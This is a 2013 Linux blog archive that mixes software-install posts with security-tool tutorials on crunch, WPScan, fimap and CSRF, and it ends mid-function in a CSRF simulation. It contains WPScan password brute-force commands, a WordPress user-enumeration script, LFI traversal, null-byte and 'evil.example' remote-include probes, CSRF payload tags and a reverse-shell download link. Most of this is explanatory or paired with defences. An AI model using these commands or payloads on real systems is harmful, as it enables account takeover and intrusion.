Sunday, 31 March 2013

Install Indicator Reminder for Ubuntu/Linux Mint


Indicator Reminder is an indicator app designed for Ubuntu to set scheduled reminders. It is built with the Quickly development tool and written in Python using GTK+, and is licensed under the GNU General Public License version 3. Reminders can be configured to play a sound, show a notification, and/or run a command. Want to wake up in the morning? Schedule a reminder every day with music to wake you up.
Indicator Reminder has a powerful date/time selection feature that lets you express recurring dates and times in plain English, for example "every day", "every Monday", "every other", "every weekday", "every 30 minutes", and more. Reminders can also be set to repeat minutely or hourly.

To install Indicator Reminder in Ubuntu/Linux Mint:


  • sudo add-apt-repository ppa:bhdouglass/indicator-remindor

  • sudo apt-get update

  • sudo apt-get install indicator-remindor



or install Remindor-Qt (the Qt front end) with these commands:


  • sudo add-apt-repository ppa:bhdouglass/indicator-remindor

  • sudo apt-get update

  • sudo apt-get install remindor-qt


 



Saturday, 30 March 2013

How to Recover Deleted Files From Pendrive



Introduction




  • fatback is a tool shipped in BackTrack 5 that recovers deleted files from FAT (File Allocation Table) file systems.

  • fatback first reads the FAT file system image, then recovers the deleted files it finds.

  • The tool was developed in 2000-2001 at the DoD (Department of Defense) Computer Forensics Lab by SrA Nicholas Harbour.

  • fatback is also useful for investigating Windows file systems.
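To make the recovery step concrete, here is an added Python example (not fatback's own code) that does for a small FAT12 image what fatback does for a real one: read the BIOS Parameter Block, walk the root directory, pick out entries whose first byte is the 0xE5 deletion marker, and carve the file back out of the data area. The image is constructed in memory, and the file names and contents are invented for the example. Two caveats the code makes visible: deletion overwrites the first character of the name, so it comes back as an underscore, and the FAT chain is released on delete, so the carve assumes the clusters were contiguous (fragmented files come back partly wrong).

```python
import struct

SECTOR = 512
SECRET_CONTENT = (b"confidential memo line\n" * 40)[:700]   # constructed file body, 700 bytes


def _dir_entry(name, ext, first_cluster, size, attr=0x20, deleted=False):
    """Pack one 32-byte FAT directory entry (8.3 name, attribute, start cluster, size)."""
    raw = name.ljust(8).encode("ascii")
    if deleted:
        raw = b"\xE5" + raw[1:]          # deletion only overwrites the first name byte
    return struct.pack("<8s3sBBBHHHHHHHI", raw, ext.ljust(3).encode("ascii"), attr,
                       0, 0, 0, 0, 0, first_cluster >> 16, 0, 0, first_cluster & 0xFFFF, size)


def build_sample_image():
    """Constructed 32 KiB FAT12 image with one live file and one deleted file (not a real disk)."""
    bps, spc, reserved, nfats, root_entries, total, fat_sectors = SECTOR, 1, 1, 1, 16, 64, 1
    img = bytearray(bps * total)
    img[0:3] = b"\xEB\x3C\x90"
    # BPB fields: bytes/sector, sectors/cluster, reserved, FAT count, root entries, sectors, media, FAT size
    struct.pack_into("<HBHBHHBH", img, 11, bps, spc, reserved, nfats, root_entries, total, 0xF8, fat_sectors)
    img[510:512] = b"\x55\xAA"
    fat = reserved * bps
    img[fat:fat + 3] = b"\xF8\xFF\xFF"          # FAT12 entries 0 and 1 (media byte, end marker)
    img[fat + 3] = 0xFF
    img[fat + 4] |= 0x0F                        # cluster 2 = end of chain: HELLO.TXT is one cluster
    # clusters 3 and 4 (the deleted file's chain) stay zero: the FAT releases them on delete
    root = (reserved + nfats * fat_sectors) * bps
    data = root + root_entries * 32
    img[root:root + 32] = _dir_entry("HELLO", "TXT", 2, 12)
    img[root + 32:root + 64] = _dir_entry("SECRET", "DOC", 3, len(SECRET_CONTENT), deleted=True)
    img[data:data + 12] = b"hello world\n"
    img[data + bps:data + bps + len(SECRET_CONTENT)] = SECRET_CONTENT   # clusters 3 and 4, contiguous
    return img


def parse_bpb(img):
    """Read the BIOS Parameter Block fields needed to locate the root directory and data area."""
    bps, spc, reserved, nfats, root_entries, _total, _media, fat_sectors = \
        struct.unpack_from("<HBHBHHBH", img, 11)
    root_off = (reserved + nfats * fat_sectors) * bps
    return {"bps": bps, "spc": spc, "root_off": root_off, "root_entries": root_entries,
            "data_off": root_off + root_entries * 32}


def recover_deleted(img):
    """Return (name, start_cluster, size, data) for every deleted root-directory entry.

    The FAT chain is gone after deletion, so this assumes the file's clusters were
    contiguous, the same guess a quick fatback recovery makes."""
    bpb = parse_bpb(img)
    cluster_bytes = bpb["bps"] * bpb["spc"]
    recovered = []
    for i in range(bpb["root_entries"]):
        raw = bytes(img[bpb["root_off"] + 32 * i: bpb["root_off"] + 32 * (i + 1)])
        if raw[0] == 0x00:
            break                                       # no more entries after a never-used slot
        name, ext, attr, _, _, _, _, _, hi, _, _, lo, size = struct.unpack("<8s3sBBBHHHHHHHI", raw)
        if raw[0] != 0xE5 or attr == 0x0F or attr & 0x08:
            continue                                    # live entry, long-name fragment, or volume label
        base = "_" + name[1:].decode("ascii", "replace").rstrip()   # first letter is lost to the marker
        ext_s = ext.decode("ascii", "replace").rstrip()
        fname = f"{base}.{ext_s}" if ext_s else base
        start = (hi << 16) | lo
        nclusters = -(-size // cluster_bytes)            # ceiling division
        off = bpb["data_off"] + (start - 2) * cluster_bytes   # data area starts at cluster 2
        recovered.append((fname, start, size, bytes(img[off: off + nclusters * cluster_bytes])[:size]))
    return recovered


if __name__ == "__main__":
    for fname, start, size, body in recover_deleted(build_sample_image()):
        print(f"{fname}: start cluster {start}, {size} bytes, carved {len(body)} bytes")
```

On a real image, feed the output of `dd if=/dev/sdb of=usb.img` into `recover_deleted(open("usb.img", "rb").read())`; subdirectories, FAT16/FAT32 and long file names would need the same loop applied to each directory's cluster chain, which fatback handles for you.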







Friday, 29 March 2013

Create wordlist in crunch



Crunch is a wordlist generator that takes a standard character set or one you specify and generates all possible combinations and permutations.



Features



  • crunch generates wordlists in both combination and permutation modes

  • it can break up output by number of lines or file size

  • now has resume support

  • patterns now support numbers and symbols

  • patterns now support upper and lower case characters separately

  • adds a status report when generating multiple files

  • new -l option for literal use of the @,%^ placeholder characters

  • new -d option to limit duplicate characters; see the man page for details

  • now has Unicode support

Download Link - http://sourceforge.net/projects/crunch-wordlist/
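As an added example (not crunch's own code), the Python below reimplements the pattern expansion behind crunch's -t option: @ stands for a lower-case letter, , for upper case, % for a digit and ^ for a symbol; a backslash escapes a literal (standing in for -l), a cap on repeated characters plays the role of -d, and the chunking mirrors -c with crunch's first-last.txt file names. The symbol set is an assumption that resembles crunch's default; check the man page for the exact one. Counting before generating matters in practice: eight @ slots is 26^8, about 209 billion lines, which no disk you carry will hold.

```python
import itertools

LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()
DIGITS = "0123456789"
SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/"      # assumed; close to crunch's default symbol set
PLACEHOLDERS = {"@": LOWER, ",": UPPER, "%": DIGITS, "^": SYMBOLS}


def parse_pattern(pattern):
    """Turn a crunch -t style pattern into one alphabet per output position.

    A backslash escapes the next character so it is emitted literally (stand-in for -l)."""
    slots, i = [], 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and i + 1 < len(pattern):
            slots.append(pattern[i + 1])
            i += 2
            continue
        slots.append(PLACEHOLDERS.get(ch, ch))     # unknown characters are literals
        i += 1
    return slots


def longest_run(word):
    """Length of the longest run of identical consecutive characters (what -d limits)."""
    best = run = 1 if word else 0
    for a, b in zip(word, word[1:]):
        run = run + 1 if a == b else 1
        best = max(best, run)
    return best


def count_words(pattern):
    """Number of candidates a pattern expands to; know this before writing the file."""
    n = 1
    for alphabet in parse_pattern(pattern):
        n *= len(alphabet)
    return n


def pattern_words(pattern, max_run=None):
    """Lazily generate every word for the pattern, optionally capping repeated characters."""
    for combo in itertools.product(*parse_pattern(pattern)):
        word = "".join(combo)
        if max_run is not None and longest_run(word) > max_run:
            continue
        yield word


def split_into_files(words, per_file):
    """Chunk the stream the way crunch's -c does, naming each chunk first-last.txt."""
    chunks, buf = [], []
    for w in words:
        buf.append(w)
        if len(buf) == per_file:
            chunks.append((f"{buf[0]}-{buf[-1]}.txt", buf))
            buf = []
    if buf:
        chunks.append((f"{buf[0]}-{buf[-1]}.txt", buf))
    return chunks


if __name__ == "__main__":
    print(count_words("pass%%"), "candidates for pass%%")
    for name, words in split_into_files(pattern_words("pass%%"), 40):
        print(name, len(words), "lines")
```

Generation is a generator on purpose: pipe it straight into the cracker (`for w in pattern_words(...)`) instead of materialising a list, which is also why crunch writes to stdout by default.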



Thursday, 28 March 2013

Install SMPlayer 0.8.4 in Ubuntu 13.04


SMPlayer is a free media player for Windows and Linux with built-in codecs that can play virtually all video and audio formats. It doesn't need any external codecs. Just install SMPlayer and you'll be able to play all formats without the hassle to find and install codec packs.

One of the most interesting features of SMPlayer: it remembers the settings of all files you play. So you start to watch a movie but you have to leave... don't worry, when you open that movie again it will be resumed at the same point you left it, and with the same settings: audio track, subtitles, volume...

SMPlayer is a graphical user interface (GUI) for the award-winning MPlayer, which is capable of playing almost all known video and audio formats. But apart from providing access for the most common and useful options of MPlayer, SMPlayer adds other interesting features like the possibility to play Youtube videos or download subtitles.

List of Features:

  • Complete preferences dialog, where you can change the key shortcuts, colors and fonts of the subtitles, and many more.

  • Filters. Many video and audio filters are available: deinterlace, postprocessing, denoise... and even a karaoke filter (voice removal).

  • Seeking by mouse wheel. You can use your mouse wheel to go forward or backward in the video. The mouse buttons can also be customized.

  • Video equalizer, allows you to adjust the brightness, contrast, hue, saturation and gamma of the video image.

  • Multiple speed playback. You can play at 2X, 4X... and even in slow motion.

  • Audio and subtitles delay adjustment. Allows you to sync audio and subtitles.

  • Advanced options, such as selecting a demuxer or video & audio codecs.

  • Possibility to search and download subtitles from opensubtitles.org.

  • It can play YouTube videos. A YouTube browser is included, which also allows you to download YouTube videos easily.

  • Translations: currently SMPlayer is translated into more than 30 languages, including Spanish, German, French, Italian, Russian, Chinese, Japanese....

  • Possibility to change the style and icon set of the interface.

  • Free and opensource. SMPlayer is under the GPL license.


Fixes in this Release:

  • New option to select the fps for external subtitles.

  • YouTube is fixed again.

  • Now smplayer checks for updates automatically and notifies the user if a new version is found.

  • Support for encoding ISO-8859-16 for subtitles.

  • New translations: Thai and Hebrew.

  • The video equalizer dialog has been rewritten.

  • Some bugfixes.


Supported Input Formats

- (S)VCD (Super Video CD)
- CDRwin's .bin image file
- DVD, including encrypted DVD
- MPEG-1/2 (ES/PS/PES/VOB)
- AVI file format
- ASF/WMV/WMA format
- QT/MOV/MP4 format
- RealAudio/RealVideo format
- Ogg/OGM files
- Matroska
- NUT
- NSV (Nullsoft Streaming Video)
- VIVO format
- FLI format
- NuppelVideo format
- yuv4mpeg format
- FILM (.cpk) format
- RoQ format
- PVA format
- streaming via HTTP/FTP, RTP/RTSP, MMS/MMST, MPST, SDP
- TV grabbing

Supported Video (only the most important are listed)

- MPEG-1 (VCD) and MPEG-2 (SVCD/DVD/DVB) video
- MPEG-4 ASP in all variants including DivX ;-), OpenDivX (DivX4), DivX 5 (Pro), Xvid
- MPEG-4 AVC aka H.264
- Windows Media Video 7/8 (WMV1/2)
- Windows Media Video 9 (WMV3) (using x86 DLL)
- RealVideo 1.0, 2.0 (G2)
- RealVideo 3.0 (RP8), 4.0 (RP9) (using Real libraries)
- Sorenson v1/v3 (SVQ1/SVQ3), Cinepak, RPZA and other QuickTime codecs
- DV video
- 3ivx
- Intel Indeo3 (3.1, 3.2)
- Intel Indeo 4.1 and 5.0 (using x86 DLL or XAnim codecs)
- VIVO 1.0, 2.0, I263 and other H.263(+) variants (using x86 DLL)
- MJPEG, AVID, VCR2, ASV2 and other hardware formats
- FLI/FLC
- HuffYUV
- various old simple RLE-like formats

Supported audio codecs (only the most important are listed)

- MPEG layer 1, 2, and 3 (MP3) audio
- AC3/A52, E-AC3, DTS (Dolby Digital) audio (software or SP/DIF)
- AAC (MPEG-4 audio)
- WMA (DivX Audio) v1, v2
- WMA 9 (WMAv3), Voxware audio, ACELP.net etc (using x86 DLLs)
- RealAudio: COOK, SIPRO, ATRAC3 (using Real libraries)
- RealAudio: DNET and older codecs
- QuickTime: Qclp, Q-Design QDMC/QDM2, MACE 3/6 (using QT libraries), ALAC
- Ogg Vorbis audio
- VIVO audio (g723, Vivo Siren) (using x86 DLL)
- alaw/ulaw, (ms)gsm, pcm, *adpcm and other simple old audio formats

To install SMPlayer in Ubuntu/Linux Mint


  • sudo add-apt-repository ppa:rvm/smplayer

  • sudo apt-get update

  • sudo apt-get install smplayer smtube smplayer-themes


 





Enumerate Wordpress Users Using Wpscan in Kali Linux


WPScan is a black box WordPress security scanner written in Ruby that attempts to find known security weaknesses in WordPress installations. It is intended for security professionals and WordPress administrators to assess the security posture of their WordPress installations. The code base is open source and licensed under the GPLv3.

Features include:

Username enumeration
Weak password cracking (multithreaded)
Version enumeration
Vulnerability enumeration (based on version)
Plugin enumeration (todo)
Plugin vulnerability enumeration (based on version) (todo)
Other miscellaneous checks

 

Installation:

Please use the up-to-date instructions found at http://wpscan.org/

WPScan requires two non-native Ruby gems, typhoeus and xml-simple. It should work on both Ruby 1.8.x and 1.9.x.
sudo apt-get install libcurl4-gnutls-dev
sudo gem install --user-install typhoeus
sudo gem install --user-install xml-simple

(I developed WPScan on Backtrack5 Gnome 32bit; if installing on another OS, you may not need the --user-install option when installing the non-native gems)

Download:

WPScan is hosted on GitHub at https://github.com/wpscanteam/wpscan.

You can download and start running WPScan by cloning the git repository:
git clone https://github.com/wpscanteam/wpscan.git

Example usage:
ruby wpscan.rb --url www.example.com
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
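The username enumeration in the feature list works because WordPress answers /?author=N with a redirect to /author/<nicename>/ (or serves the author archive page, whose <body> class carries author-<nicename>), so walking N leaks the account names. The added Python below (not WPScan's code) implements that walk against a constructed set of responses so it runs offline; swap fake_fetch for an HTTP client to use it on a target you are authorised to test. The site name and the users are invented. Note that what leaks is the user_nicename, which usually equals the login name but can differ.

```python
import re

# Constructed responses standing in for a live WordPress site (no network access needed).
# Assumed site http://www.example.com; format: path -> (status, headers, body).
FAKE_SITE = {
    "/?author=1": (301, {"Location": "http://www.example.com/author/admin/"}, ""),
    "/?author=2": (302, {"Location": "http://www.example.com/author/editor-jane/"}, ""),
    "/?author=3": (200, {}, '<html><body class="archive author author-3 author-contentbob">'),
}


def fake_fetch(path):
    """Stand-in for an HTTP GET that does not follow redirects."""
    return FAKE_SITE.get(path, (404, {}, "<h1>Page not found</h1>"))


REDIRECT_SLUG = re.compile(r"/author/([^/?#]+)")
CLASS_ATTR = re.compile(r'<body[^>]*\bclass="([^"]*)"', re.I)


def slug_from_body(body):
    """Pull the author-<nicename> class from an author archive page, skipping author-<id>."""
    m = CLASS_ATTR.search(body)
    if not m:
        return None
    for cls in m.group(1).split():
        if cls.startswith("author-") and not cls[len("author-"):].isdigit():
            return cls[len("author-"):]
    return None


def enumerate_authors(fetch, max_id=10, stop_after_misses=3):
    """Walk /?author=N and collect {id: nicename}; stop after a run of ids that resolve to nothing."""
    users, misses = {}, 0
    for uid in range(1, max_id + 1):
        status, headers, body = fetch(f"/?author={uid}")
        slug = None
        if status in (301, 302) and "Location" in headers:
            m = REDIRECT_SLUG.search(headers["Location"])
            slug = m.group(1) if m else None
        elif status == 200:
            slug = slug_from_body(body)
        if slug:
            users[uid] = slug
            misses = 0
        else:
            misses += 1                      # deleted ids leave gaps, so tolerate a few in a row
            if misses >= stop_after_misses:
                break
    return users


if __name__ == "__main__":
    for uid, name in enumerate_authors(fake_fetch).items():
        print(f"id {uid}: {name}")
```

The defensive reading is the same code run against your own site: if it returns names, the fix is to block the ?author= redirect (a rewrite rule or a plugin that disables author archives) and to give users a display name that differs from their login.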

 





Install Shotwell Photo Manager in Ubuntu


Shotwell is a digital photo organizer for Linux, designed specifically for the GNOME desktop. It can import, edit, sort and organize a user's image collection in a fast and secure manner.

What's new in this Release:

  • RAW and enhanced images: Shotwell is now smarter at keeping paired images together.

  • Better reporting, and options to save the details, if something fails.

  • Shotwell now uses the new Facebook Graph API.

  • New circular and checkerboard transitions and other nifty new wipes.

  • Along with all this come many bug fixes, UI nits squashed and glitches fixed.


Shotwell official site: http://www.yorba.org

To install shotwell in Ubuntu/Linux Mint


  • sudo add-apt-repository ppa:yorba/ppa

  • sudo apt-get update

  • sudo apt-get install shotwell


Tuesday, 26 March 2013

Dorking with Fimap in BackTrack 5 R3


fimap is a little Python tool which can find, prepare, audit, exploit and even Google automatically for local and remote file inclusion bugs in web apps. fimap aims to be something like sqlmap, just for LFI/RFI bugs instead of SQL injection. It is currently under heavy development but it is usable.

The goal of fimap is to improve the quality and security of your website.

Quick News for SVN and upcoming versions



  • Bing search module implemented in SVN! Currently broken :-O

  • SSH log files can now be scanned and exploited through the SSH username!

  • You can now define which target to exploit and execute shell commands without the interactive exploit interface! (FimapNonInteractiveExec)

  • New experimental fallback plugin which you can try when only /etc/passwd (or any other read-only file) was found. (FimapPhpInfoExploit)

  • New fallback plugin for Windows victims! (FimapFindFirstFileExploit)


what works currently?



  • Check a single URL, a list of URLs, or Google results fully automatically.

  • Can identify and exploit file inclusion bugs.

    • Relative/absolute path handling.

    • Tries automatically to eliminate suffixes with a null byte and other methods like dot truncation.

    • Remotefile Injection.

    • Logfile Injection. (FimapLogInjection)



  • Test and exploit multiple bugs:

    • include()

    • include_once()

    • require()

    • require_once()



  • You always define absolute pathnames in the configs. No redundant relative paths like:

    • ../etc/passwd

    • ../../etc/passwd

    • ../../../etc/passwd



  • Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. BlindMode

  • Has an interactive exploit mode which...

    • ...can spawn a shell on vulnerable systems.

    • ...can spawn a reverse shell on vulnerable systems.

    • ...can do everything you have added in your payload-dict inside the config.py



  • Add your own payloads and paths to the config.py file.

  • Has a Harvest mode which can collect URLs from a given domain for later pentesting.

  • Goto FimapHelpPage for all features.

  • Works also on windows.

  • Can handle directories in RFI mode like:

    • <? include ($_GET["inc"] . "/content/index.html"); ?>

    • <? include ($_GET["inc"] . "_lang/index.html"); ?>

    • where Null-Byte is not possible.



  • Can use proxies.

  • Scans and exploits GET, POST and Cookies.

  • Has a very small footprint. (No senseless brute-forcing of paths, unless you need it.)

  • Can attack also windows servers! (WindowsAttack)

  • Has a tiny plugin interface for writing exploitmode plugins (PluginDevelopment)


  • Non Interactive Exploiting (FimapNonInteractiveExec)


what doesn't work yet?



  • Other languages than PHP (even if engine is ready for others as well.)
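As an added example, not part of fimap or the original post, the Python below emulates the include($_GET["inc"] . "/content/index.html") pattern from the feature list and shows why the appended suffix matters to an attacker: a plain traversal string ends up with /content/index.html glued on and the include fails, a null byte (on PHP builds before 5.3.4) cuts the suffix off, and a URL prefix turns the call into a remote include when allow_url_include is on. A hardened resolver follows, plus a small classifier for spotting these probes in access logs. WEBROOT and ALLOWED_PAGES are assumed values.

```python
import posixpath

WEBROOT = "/var/www/site"                     # assumed document root for the example
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed set of legitimate include targets


def vulnerable_include_path(inc):
    """Emulate include($_GET["inc"] . "/content/index.html") the way fimap probes it.

    The attacker owns the prefix; the application only appends a suffix.  The NUL
    truncation mirrors PHP builds older than 5.3.4, which stopped reading at \\x00."""
    if "://" in inc:
        # remote include: with allow_url_include enabled PHP fetches this URL, suffix and all,
        # so the attacker simply hosts /content/index.html on their own server
        return inc + "/content/index.html"
    path = (inc + "/content/index.html").split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(WEBROOT, path))   # absolute inc replaces WEBROOT, as in PHP


def hardened_include_path(inc):
    """Allow-list the page name, build the path server-side, then verify it stays under WEBROOT."""
    if inc not in ALLOWED_PAGES:
        raise ValueError(f"refused include target: {inc!r}")
    path = posixpath.normpath(posixpath.join(WEBROOT, inc, "content", "index.html"))
    # defence in depth; on a real filesystem use os.path.realpath() so symlinks cannot escape either
    if posixpath.commonpath([WEBROOT, path]) != WEBROOT:
        raise ValueError("path escapes the document root")
    return path


def include_allowed(inc):
    """True if the hardened resolver would serve this value."""
    try:
        hardened_include_path(inc)
        return True
    except ValueError:
        return False


def classify_probe(inc):
    """Label a request parameter with the LFI/RFI trick it carries, for log review or WAF rules."""
    if "://" in inc:
        return "rfi"
    if "\x00" in inc:
        return "lfi-nullbyte"
    if "/../" in "/" + inc + "/":
        return "lfi-traversal"
    return "benign"


if __name__ == "__main__":
    for probe in ["about", "../../../etc/passwd", "../../../etc/passwd\x00", "http://evil.example"]:
        print(repr(probe), "->", classify_probe(probe), "|", vulnerable_include_path(probe),
              "| allowed:", include_allowed(probe))
```

The allow-list is the real fix; the commonpath check only catches mistakes in how the allowed names are turned into paths. Neither replaces turning allow_url_include off.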





Monday, 25 March 2013

Install and enable XScreenSaver in Ubuntu 12.04.2


XScreenSaver is the standard screen saver collection shipped on most Linux and Unix systems running the X11 Window System. I released the first version in 1992. I ported it to MacOS X in 2006, and to iOS in 2012. On X11 systems, XScreenSaver is two things: it is both a large collection of screen savers; and it is also the framework for blanking and locking the screen. On MacOS systems, these screen savers work with the usual MacOS screen saving framework (X11 is not required). On iOS devices, it is an application that lets you run each of the demo modes manually.

XScreenSaver is a collection of many free screensavers for Linux.

sudo apt-get remove gnome-screensaver
sudo apt-get install xscreensaver xscreensaver-gl-extra xscreensaver-data-extra

To start it automatically, create an autostart file by entering the following command in a terminal:

sudo gedit /etc/xdg/autostart/screensaver.desktop

then copy and paste the following into the file:

[Desktop Entry]
Name=Screensaver
Type=Application
Exec=xscreensaver -nosplash

Save and Exit the file.







 

Sunday, 24 March 2013

Python Reverse shell


simple reverse shell written in Python (BSIDESLV and Defcon 20 Demo)

Download Python Reverse shell - http://adf.ly/LVvor




Saturday, 23 March 2013

How to install qbittorrent in ubuntu 12.04.2


I think everybody likes to download from torrents; it is a safe and easy way to download. You can install qBittorrent with the following commands.

Commands :

        sudo add-apt-repository ppa:noobslab/initialtesting
        sudo apt-get update
        sudo apt-get install qbittorrent

Download qbittorrent For Windows : http://adf.ly/LSLQr


Description



An advanced and multi-platform BitTorrent client with a nice Qt4 user interface as well as a Web UI for remote control and an integrated search engine. qBittorrent aims to meet the needs of most users while using as little CPU and memory as possible.




Features




  • Simultaneous download of multiple torrents

  • Integrated torrent search engine

  • Integrated RSS feed reader and downloader

  • Good internationalization

  • DHT, PeX, Encryption, LSD, UPnP, NAT-PMP, µTP

  • Cross platform (Linux, Mac Os, Windows)

  • Very lightweight

  • Torrent queueing and prioritizing

  • Control over files in a torrent (filtering, prioritizing)

  • Nice µTorrent-like interface with Qt4 toolkit (qBittorrent v2.x)

  • IP filtering (eMule dat files or PeerGuardian files)

  • Peer display with country and hostname resolution (qBittorrent v2.x)

  • Advanced control over torrent trackers (qBittorrent v2.x)

  • Closest open source equivalent to µTorrent (qBittorrent v2.x)

  • Torrent creation tool

  • Remote control through Secure Web User Interface





Cross Site Request Forgery Vulnerability


Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.

For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish this from a legitimate user request.

In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information, retrieve account information, or any other function provided by the vulnerable website.

Sometimes, it is possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called Stored CSRF flaws. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already.

Synonyms: CSRF attacks are also known by a number of other names, including XSRF, "Sea Surf", Session Riding, Cross-Site Reference Forgery, Hostile Linking. Microsoft refers to this type of attack as a One-Click attack in their threat modeling process and many places in their online documentation.

Prevention measures that do NOT work


Using a secret cookie
Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.
Only accepting POST requests
Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in attacker's website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks form will do something else.

Examples


How does the attack work?


There are numerous ways in which an end-user can be tricked into loading information from or submitting information to a web application. In order to execute an attack, we must first understand how to generate a malicious request for our victim to execute. Let us consider the following example: Alice wishes to transfer $100 to Bob using bank.com. The request generated by Alice will look similar to the following:
POST http://bank.com/transfer.do HTTP/1.1
...
...
...
Content-Length: 19

acct=BOB&amount=100

However, Maria notices that the same web application will execute the same transfer using URL parameters as follows:
GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1

Maria now decides to exploit this web application vulnerability using Alice as her victim. Maria first constructs the following URL which will transfer $100,000 from Alice's account to her account:
http://bank.com/transfer.do?acct=MARIA&amount=100000

Now that her malicious request is generated, Maria must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:
<a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>

Assuming Alice is authenticated with the application when she clicks the link, the transfer of $100,000 to Maria's account will occur. However, Maria realizes that if Alice clicks the link, then Alice will notice that a transfer has occurred. Therefore, Maria decides to hide the attack in a zero-byte image:
<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">

If this image tag were included in the email, Alice would only see a little box indicating that the browser could not render the image. However, the browser will still submit the request to bank.com without any visual indication that the transfer has taken place.

Related Attacks



Related Controls



  • Add a per-request nonce to the URL and all forms in addition to the standard session. This is also referred to as "form keys". Many frameworks (e.g., Drupal 4.7.4+) either have or are starting to include this type of protection built in to every form so the programmer does not need to code it manually.

  • TBD: Add a per-session nonce to URL and all forms

  • TBD: Add a hash(session id, function name, server-side secret) to URL and all forms

  • TBD: .NET - add session identifier to ViewState with MAC

  • Checking the Referer header of the client's HTTP request blocks the basic attack: if the request did not come from the original site, requests forged from other sites will not function. It is very common to see referrer checks used on embedded network hardware due to memory limitations. The check is not a complete defence, though: browsers and proxies sometimes strip the Referer header, so a strict check breaks legitimate users while a lenient one that accepts a missing header lets forged requests through. XSS can also be used to bypass both referrer and token based checks simultaneously; for instance the Samy worm used an XHR to obtain the CSRF token to forge requests.

  • "Although cross-site request forgery is fundamentally a problem with the web application, not the user, users can help protect their accounts at poorly designed sites by logging off the site before visiting another, or clearing their browser's cookies at the end of each browser session." -http://en.wikipedia.org/wiki/Cross-site_request_forgery#_note-1

  • Tokenizing
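The following added Python example (not from the original article or any framework) replays the bank.com scenario against two versions of transfer.do: the vulnerable one, which trusts the session cookie alone, and one protected with the hash(session id, function name, server-side secret) token from the list above. It models only what the server receives, which is the whole point: the browser attaches Alice's cookie whether the request came from her or from Maria's <img>, so a "secret cookie" changes nothing, and a hidden auto-submitted form forges a POST as easily as an <img> forges a GET. The names follow the text; SERVER_SECRET and the in-memory session store are stand-ins for a real key and session backend.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass

SERVER_SECRET = secrets.token_bytes(32)   # assumed server-side key; never leaves the server
SESSIONS = {}                             # session id -> account state (stand-in for a session store)


@dataclass
class Request:
    """What bank.com receives.  Cookies are attached by the browser whoever triggered the request."""
    method: str
    cookies: dict
    params: dict


def login(user, balance=100_000):
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "balance": balance}
    return sid


def csrf_token(sid, action):
    """hash(session id, function name, server-side secret): tied to one session and one action.

    The page embeds it in the form body; a page on another origin cannot read it."""
    return hmac.new(SERVER_SECRET, f"{sid}:{action}".encode(), hashlib.sha256).hexdigest()


def _session(req):
    return SESSIONS.get(req.cookies.get("session"))


def transfer_vulnerable(req):
    """transfer.do as in the example above: the session cookie alone authorises the transfer."""
    sess = _session(req)
    if sess is None:
        return 401
    sess["balance"] -= int(req.params["amount"])
    return 200


def transfer_protected(req):
    """Same function with a per-session, per-action token the attacker's page cannot obtain."""
    sess = _session(req)
    if sess is None:
        return 401
    if req.method != "POST":                 # state changes only via POST: necessary, not sufficient
        return 405
    expected = csrf_token(req.cookies["session"], "transfer")
    supplied = req.params.get("csrf", "")
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403                           # forged: token missing, stale, or minted for another action
    sess["balance"] -= int(req.params["amount"])
    return 200


def forged_request(sid, method):
    """What Alice's browser sends when Maria's <img> or auto-submitted <form> fires: cookie yes, token no."""
    return Request(method, {"session": sid}, {"acct": "MARIA", "amount": "100000"})


def run_scenario():
    """Replay the attack against both handlers; returns status codes and Alice's balance at each step."""
    out = {}
    sid = login("alice")
    out["vulnerable_img_get"] = transfer_vulnerable(forged_request(sid, "GET"))
    out["balance_after_vulnerable"] = SESSIONS[sid]["balance"]

    sid = login("alice")                     # fresh account for the protected handler
    out["protected_img_get"] = transfer_protected(forged_request(sid, "GET"))
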